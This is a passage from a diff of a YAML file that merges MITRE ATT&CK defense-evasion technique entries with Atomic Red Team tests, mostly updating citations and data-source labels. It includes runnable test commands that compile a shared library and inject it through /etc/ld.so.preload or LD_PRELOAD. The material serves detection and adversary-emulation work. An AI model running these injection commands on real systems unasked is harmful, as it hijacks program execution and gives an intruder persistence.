https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. + type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack - phase_name: defense-evasion + phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - type: attack-pattern + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1055.001: + technique: external_references: - source_name: mitre-attack external_id: T1055.001 @@ -30621,11 +23143,11 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.endgame.com/blog/technical-blog/hunting-memory description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017. - source_name: Endgame HuntingNMemory June 2017 + source_name: Elastic HuntingNMemory June 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -30638,26 +23160,33 @@ defense-evasion: loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary - API responsible for loading the DLL). (Citation: Endgame Process Injection + API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: - Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July + Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. " id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.879Z' + created: '2020-01-14T01:26:08.145Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_permissions_required: - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types @@ -30667,7 +23196,7 @@ defense-evasion: common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine @@ -30784,9 +23313,8 @@ defense-evasion: is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Process: Process Creation' x_mitre_contributors: - Jimmy Astle, @AstleJimmy, Carbon Black - Erika Noerenberg, @gutterchurl, Carbon Black @@ -30795,6 +23323,25 @@ defense-evasion: atomic_tests: [] T1480.001: technique: + created: '2020-06-23T22:28:28.041Z' + modified: '2021-03-29T19:56:42.242Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995 + description: |- + Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) + + Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). + + Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. + + Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. + name: Environmental Keying + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1480.001 @@ -30816,7 +23363,7 @@ defense-evasion: description: Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. - source_name: Environmental Keyed HTA - url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ + url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/ description: Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. - source_name: 'Ebowla: Genetic Malware' @@ -30827,47 +23374,29 @@ defense-evasion: url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Environmental Keying - description: |- - Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) - - Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). - - Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. - - Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. - id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-24T18:52:12.719Z' - created: '2020-06-23T22:28:28.041Z' - x_mitre_contributors: - - Nick Carr, FireEye - x_mitre_detection: Detecting the use of environmental keying may be difficult - depending on the implementation. Monitoring for suspicious processes being - spawned that gather a variety of system information or perform other forms - of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short - period of time, may aid in detection. - x_mitre_data_sources: - - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_defense_bypassed: - Anti-virus - Host forensic analysis - Signature-based detection - Static file analysis - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: Detecting the use of environmental keying may be difficult + depending on the implementation. Monitoring for suspicious processes being + spawned that gather a variety of system information or perform other forms + of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short + period of time, may aid in detection. + x_mitre_contributors: + - Nick Carr, FireEye atomic_tests: [] T1574.005: technique: @@ -30919,8 +23448,11 @@ defense-evasion: Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. x_mitre_data_sources: - - Process command-line parameters - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak @@ -30929,6 +23461,21 @@ defense-evasion: atomic_tests: [] T1480: technique: + created: '2019-01-31T02:10:08.261Z' + modified: '2020-06-24T18:52:12.956Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852 + description: |- + Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) + + Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. + name: Execution Guardrails + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1480 @@ -30943,42 +23490,28 @@ defense-evasion: description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Execution Guardrails - description: |- - Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) - - Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. - id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-24T18:52:12.956Z' - created: '2019-01-31T02:10:08.261Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_contributors: + - Nick Carr, FireEye + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: Detecting the use of guardrails may be difficult depending + on the implementation. Monitoring for suspicious processes being spawned that + gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), + especially in a short period of time, may aid in detection. + x_mitre_permissions_required: + - User x_mitre_defense_bypassed: - Anti-virus - Host forensic analysis - Signature-based detection - Static file analysis - x_mitre_permissions_required: - - User - x_mitre_detection: Detecting the use of guardrails may be difficult depending - on the implementation. Monitoring for suspicious processes being spawned that - gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), - especially in a short period of time, may aid in detection. - x_mitre_data_sources: - - Process monitoring - x_mitre_contributors: - - Nick Carr, FireEye - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false atomic_tests: [] T1211: technique: @@ -31020,10 +23553,6 @@ defense-evasion: x_mitre_defense_bypassed: - Anti-virus - System access controls - x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - File monitoring x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_version: '1.1' @@ -31050,7 +23579,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html description: MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017. @@ -31088,7 +23617,7 @@ defense-evasion: EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and - CreateRemoteThread.(Citation: Endgame Process Injection July + CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious @@ -31105,7 +23634,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:26:33.191Z' + modified: '2020-11-10T18:29:31.004Z' created: '2020-01-14T17:18:32.126Z' x_mitre_defense_bypassed: - Anti-virus @@ -31115,10 +23644,9 @@ defense-evasion: SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and - eventual malicious injection. (Citation: Endgame Process Injection July 2017)' + eventual malicious injection. (Citation: Elastic Process Injection July 2017)' x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_platforms: @@ -31168,9 +23696,8 @@ defense-evasion: command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe. x_mitre_data_sources: - - Binary file metadata - - Process command-line parameters - - File monitoring + - 'File: File Deletion' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -31427,7 +23954,7 @@ defense-evasion: description: |- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). - Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). + Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). external_references: - source_name: mitre-attack external_id: T1222 @@ -31469,10 +23996,10 @@ defense-evasion: x_mitre_defense_bypassed: - File system access controls x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Metadata' x_mitre_contributors: - CrowdStrike Falcon OverWatch - Jan Miller, CrowdStrike @@ -31537,8 +24064,10 @@ defense-evasion: x_mitre_platforms: - macOS x_mitre_data_sources: - - File monitoring - - Process command-line parameters + - 'File: File Metadata' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended @@ -31574,12 +24103,12 @@ defense-evasion: ' elevation_required: true name: sh - T1484: + T1484.001: technique: external_references: - source_name: mitre-attack - external_id: T1484 - url: https://attack.mitre.org/techniques/T1484 + external_id: T1484.001 + url: https://attack.mitre.org/techniques/T1484/001 - source_name: TechNet Group Policy Basics url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: @@ -31627,7 +24156,7 @@ defense-evasion: to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create - Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035), + Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many @@ -31641,38 +24170,37 @@ defense-evasion: set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify - GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n" - id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" + id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-26T21:17:41.231Z' - created: '2019-03-07T14:10:32.650Z' - x_mitre_is_subtechnique: false - x_mitre_defense_bypassed: - - System access controls - - File system access controls - x_mitre_detection: "It is possible to detect GPO modifications by monitoring - directory service changes using Windows event logs. Several events may be - logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory - service object was modified\n* Event ID 5137 - A directory service object - was created\n* Event ID 5138 - A directory service object was undeleted\n* - Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A - directory service object was deleted\n\n\nGPO abuse will often be accompanied - by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - which will have events associated with it to detect. Subsequent permission - value modifications, like those to SeEnableDelegationPrivilege, can also be - searched for in events associated with privileges assigned to new logons (Event - ID 4672) and assignment of user rights (Event ID 4704). " - x_mitre_version: '1.1' + modified: '2021-02-09T15:52:24.315Z' + created: '2020-12-28T21:50:59.844Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator - User + x_mitre_detection: |- + It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including: + + * Event ID 5136 - A directory service object was modified + * Event ID 5137 - A directory service object was created + * Event ID 5138 - A directory service object was undeleted + * Event ID 5139 - A directory service object was moved + * Event ID 5141 - A directory service object was deleted + + + GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). x_mitre_data_sources: - - Windows event logs + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' x_mitre_contributors: - Itamar Mizrahi, Cymptom - Tristan Bennett, Seamless Intelligence @@ -31718,8 +24246,9 @@ defense-evasion: modified: '2020-06-29T15:12:11.024Z' created: '2020-06-28T22:55:55.719Z' x_mitre_data_sources: - - File monitoring - - Windows Registry + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Firmware: Firmware Modification' x_mitre_permissions_required: - User - Administrator @@ -31778,9 +24307,10 @@ defense-evasion: x_mitre_defense_bypassed: - Host forensic analysis x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_permissions_required: - User x_mitre_detection: Monitor the file system and shell commands for files being @@ -31960,8 +24490,9 @@ defense-evasion: modified: '2020-07-31T17:42:43.768Z' created: '2020-03-13T20:12:40.876Z' x_mitre_data_sources: - - File monitoring - - Authentication logs + - 'User Account: User Account Creation' + - 'User Account: User Account Metadata' + - 'File: File Modification' x_mitre_permissions_required: - root - Administrator @@ -32072,10 +24603,10 @@ defense-evasion: to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - PowerShell logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' + - 'File: File Modification' x_mitre_platforms: - macOS - Windows @@ -32136,12 +24667,21 @@ defense-evasion: modified: '2020-09-23T11:31:50.636Z' created: '2020-02-26T17:41:25.933Z' x_mitre_data_sources: - - API monitoring - - 